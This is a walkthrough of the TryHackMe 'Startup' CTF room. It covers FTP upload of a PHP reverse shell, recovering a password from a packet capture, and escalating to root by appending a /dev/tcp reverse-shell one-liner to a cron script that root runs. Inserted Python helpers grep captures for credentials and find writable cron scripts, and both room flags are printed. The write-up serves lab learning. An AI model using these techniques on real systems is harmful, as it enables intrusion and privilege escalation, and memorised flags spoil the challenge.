TryHackMe CTF: Startup

This is a walkthrough of the "Startup" room on TryHackMe.

The IP of this machine is 10.10.20.106, so first I am going to perform an Nmap scan.

The result of the Nmap scan is:

As we can see, anonymous FTP login is allowed, so we will look into that. But first, since port 80 is open, I started Gobuster to enumerate directories on the web server; here is the result:

It shows that we can access the files directory.

Now we will log in to FTP anonymously and check whether it can be exploited. After logging in, the notice.txt file gives a username hint, "maya"; maybe we can use it somewhere. 'important.jpg' was of no use.

Let's visit the website and see what we can get from the files directory:

Now let's check if we can upload a payload to get a reverse shell. First, download the PHP reverse shell from pentestmonkey; it is a payload that connects back to a listener when the page is requested. Change the IP in it to your own (attacker) IP address, and the port to the one your listener will use.

In the FTP directory, we were able to put our payload:

Execute it on the website by clicking on it or by typing its name in the URL. Before executing it, start a netcat listener on your attacker machine.

I messed something up, so I uploaded the PHP reverse shell again to the FTP server, named "pay.php", executed it via the URL and got a connection on the netcat listener.

We can upgrade to an interactive bash shell with the following command:

/bin/bash -i

What is the secret spicy soup recipe?

And we got our first answer: love


What are the contents of user.txt?

In the home directory, there is a user lennie, but I was not able to access it, as it asked for a password. I started looking in directories for any kind of hint or password.

There is a directory named incidents in which I found a pcapng file. I downloaded it to my local machine and looked through the captured data using Wireshark.
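The Wireshark step above comes down to reading the captured payloads and looking for a credential prompt. As an added example (not part of the original walkthrough and not the room's real capture), here is a small pcapng reader that walks the file's blocks, pulls the bytes out of every Enhanced Packet Block and greps them for password-looking strings. The capture it scans is constructed in the script itself, and the password in it is made up; the block layout (Section Header, Interface Description, Enhanced Packet) follows the pcapng format.

```python
import re
import struct

# Constructed packet payloads standing in for the room's capture (not the real
# incident file). Link-layer headers are irrelevant to a string scan, so each
# "packet" here is a bare application payload; the password is made up.
CONSTRUCTED_PAYLOADS = [
    b"220 (vsFTPd 3.0.3)\r\nUSER anonymous\r\n",
    b"lennie@startup:~$ sudo -l\r\n[sudo] password for lennie: NotTheRealPassword1\r\n",
    b"Sorry, try again.\r\n",
]

SHB_TYPE = 0x0A0D0D0A          # Section Header Block
IDB_TYPE = 0x00000001          # Interface Description Block
EPB_TYPE = 0x00000006          # Enhanced Packet Block
BYTE_ORDER_MAGIC = 0x1A2B3C4D

# Anything that looks like a credential prompt or field, up to end of line.
CRED_RE = re.compile(rb"(?i)(?:password|passwd|pwd|pass)[^\r\n]*")


def _block(btype, body, endian):
    """Frame a pcapng block: type, total length, body padded to 4, total length."""
    body += b"\x00" * (-len(body) % 4)
    total = 12 + len(body)
    return struct.pack(endian + "II", btype, total) + body + struct.pack(endian + "I", total)


def build_pcapng(payloads, endian="<"):
    """Assemble a minimal pcapng file from raw payloads (used only for the demo)."""
    shb = _block(SHB_TYPE, struct.pack(endian + "IHHq", BYTE_ORDER_MAGIC, 1, 0, -1), endian)
    idb = _block(IDB_TYPE, struct.pack(endian + "HHI", 147, 0, 65535), endian)  # 147 = LINKTYPE_USER0
    epbs = b"".join(
        _block(EPB_TYPE, struct.pack(endian + "IIIII", 0, 0, i, len(p), len(p)) + p, endian)
        for i, p in enumerate(payloads)
    )
    return shb + idb + epbs


def iter_packets(data):
    """Yield captured bytes from every Enhanced Packet Block, honouring byte order."""
    off = 0
    endian = "<"
    while off + 12 <= len(data):
        btype = struct.unpack_from(endian + "I", data, off)[0]
        if btype == SHB_TYPE:
            # The SHB type reads the same in both byte orders; the magic that
            # follows the length tells us which order this section uses.
            magic = struct.unpack_from("<I", data, off + 8)[0]
            endian = "<" if magic == BYTE_ORDER_MAGIC else ">"
        total = struct.unpack_from(endian + "I", data, off + 4)[0]
        if total < 12 or off + total > len(data):
            raise ValueError("truncated or corrupt block at offset %d" % off)
        if btype == EPB_TYPE:
            # body: interface id, ts high, ts low, captured len, original len, data
            caplen = struct.unpack_from(endian + "I", data, off + 20)[0]
            yield data[off + 28: off + 28 + caplen]
        off += total


def find_credentials(pcapng_bytes):
    """Return (packet_index, matched_text) for every credential-looking string."""
    hits = []
    for idx, pkt in enumerate(iter_packets(pcapng_bytes)):
        for m in CRED_RE.finditer(pkt):
            hits.append((idx, m.group(0).decode("ascii", "replace")))
    return hits


if __name__ == "__main__":
    capture = build_pcapng(CONSTRUCTED_PAYLOADS)
    for idx, text in find_credentials(capture):
        print("packet %d: %s" % (idx, text))
```

To run it against a real file, read the bytes with open(path, "rb") and pass them to find_credentials instead of the constructed capture. The reader refuses truncated files rather than silently stopping early, which matters when a capture was cut off mid-write; and because it only looks at raw payload bytes, it misses anything TLS-protected or split across TCP segments, which is when Wireshark's Follow TCP Stream is the better tool.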

Using this password for lennie, we can access lennie's account.

And here we got the answer to the second question:

THM{03ce3d619b80ccbfb3b7fc81e46c0e79}


What are the contents of root.txt?

As there were no clear-cut instructions or hints, I read and traversed each file and directory.

So far I have not found any useful hint to elevate privileges, so let's keep looking.

There is a print.sh file which is owned by lennie but is executed by a cron job that runs as root, as can be seen. Because lennie can write to the file and root executes it, I can append a reverse shell to print.sh and get a connection back to my machine with root privileges.

I searched online for a reverse shell one-liner and appended it to the script as follows (replace ip_address with your attacker IP; the /dev/tcp redirection is a bash feature, so this only works because the script is run by bash):

echo " /bin/bash -i >& /dev/tcp/ip_address/1234 0>&1" >> /etc/print.sh

On our local machine, we need a netcat listener on port 1234 ready to catch the connection when the cron job next fires.
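The privilege escalation above rests on one condition: a cron job running as root executes a file that a low-privilege user can write. As an added example (not part of the original walkthrough), here is a checker for that condition that parses /etc/crontab-style text, pulls the absolute paths out of each job's command, and reports every existing file that runs as someone other than us but whose permission bits let us write it. The crontab it checks is constructed inside the script, with a print.sh that is owner-writable and a backup.sh that is not; the "lennie" identity it runs as is hypothetical. The writability test reads the mode bits (what ls -l shows), so it does not account for root's override or POSIX ACLs.

```python
import os
import pwd
import re
import stat
import tempfile

# Absolute paths inside a command string, e.g. "/etc/print.sh" or "/usr/bin/x".
ABS_PATH_RE = re.compile(r"(?<![\w./-])/[\w./-]+")


def parse_system_crontab(text):
    """Return (user, command) pairs from /etc/crontab-style text.
    System crontabs carry a user field; @reboot-style lines have one time field."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"[A-Za-z_]\w*=", line):
            continue  # blank, comment or environment assignment (SHELL=, PATH=)
        special = line.startswith("@")
        parts = line.split(None, 2) if special else line.split(None, 6)
        if len(parts) == (3 if special else 7):
            entries.append((parts[-2], parts[-1]))
    return entries


def writable_by(path, uid, gids):
    """Whether the permission bits let (uid, gids) write path. This mirrors what
    ls -l shows; it ignores root's override and POSIX ACLs."""
    st = os.stat(path)
    if st.st_uid == uid and st.st_mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and st.st_mode & stat.S_IWGRP:
        return True
    return bool(st.st_mode & stat.S_IWOTH)


def current_identity():
    """(username, uid, group ids) of the process running the check."""
    uid = os.getuid()
    try:
        name = pwd.getpwuid(uid).pw_name
    except KeyError:
        name = str(uid)
    return name, uid, set(os.getgroups()) | {os.getgid()}


def find_writable_cron_scripts(crontab_text, user=None):
    """Return (cron_user, path) for every existing file referenced by a cron job
    that runs as someone other than `user` but that our identity can write."""
    name, uid, gids = current_identity()
    user = user or name
    hits = []
    for cron_user, command in parse_system_crontab(crontab_text):
        if cron_user == user:
            continue  # a job already running as us gives no privilege gain
        for path in ABS_PATH_RE.findall(command):
            if os.path.isfile(path) and writable_by(path, uid, gids):
                hits.append((cron_user, path))
    return hits


def build_demo(tmpdir):
    """Create one owner-writable and one read-only script and a constructed
    /etc/crontab (not the room's) in which root runs both, as with print.sh."""
    writable = os.path.join(tmpdir, "print.sh")
    locked = os.path.join(tmpdir, "backup.sh")
    for path in (writable, locked):
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\necho demo\n")
    os.chmod(writable, 0o755)  # owner can write: the print.sh situation
    os.chmod(locked, 0o555)    # no write bit for anyone
    crontab = (
        "# constructed /etc/crontab for the demo\n"
        "SHELL=/bin/sh\n"
        "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
        "17 *  * * *  root    cd / && run-parts --report /etc/cron.hourly\n"
        "*  *  * * *  root    %s\n"
        "*  *  * * *  root    %s --quiet\n"
        "@reboot      lennie  %s\n" % (writable, locked, writable)
    )
    return crontab, writable, locked


def demo(user="lennie"):
    """Run the check on the constructed crontab as the hypothetical user `user`."""
    tmpdir = tempfile.mkdtemp(prefix="cron-demo-")
    crontab, writable, locked = build_demo(tmpdir)
    return find_writable_cron_scripts(crontab, user=user), writable, locked


if __name__ == "__main__":
    hits, _, _ = demo()
    for cron_user, path in hits:
        print("%s runs %s, which we can modify" % (cron_user, path))
```

On a real box, feed it the contents of /etc/crontab and the files under /etc/cron.d; user-specific crontabs in /var/spool/cron have no user field and need the other split. The same hit also tells you what to verify before writing a payload: the script's interpreter (the /dev/tcp trick needs bash), and how often the job fires, which is how long you will wait for the shell.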

And we got our answer: THM{f963aaa6a430f210222158ae15c3d76d}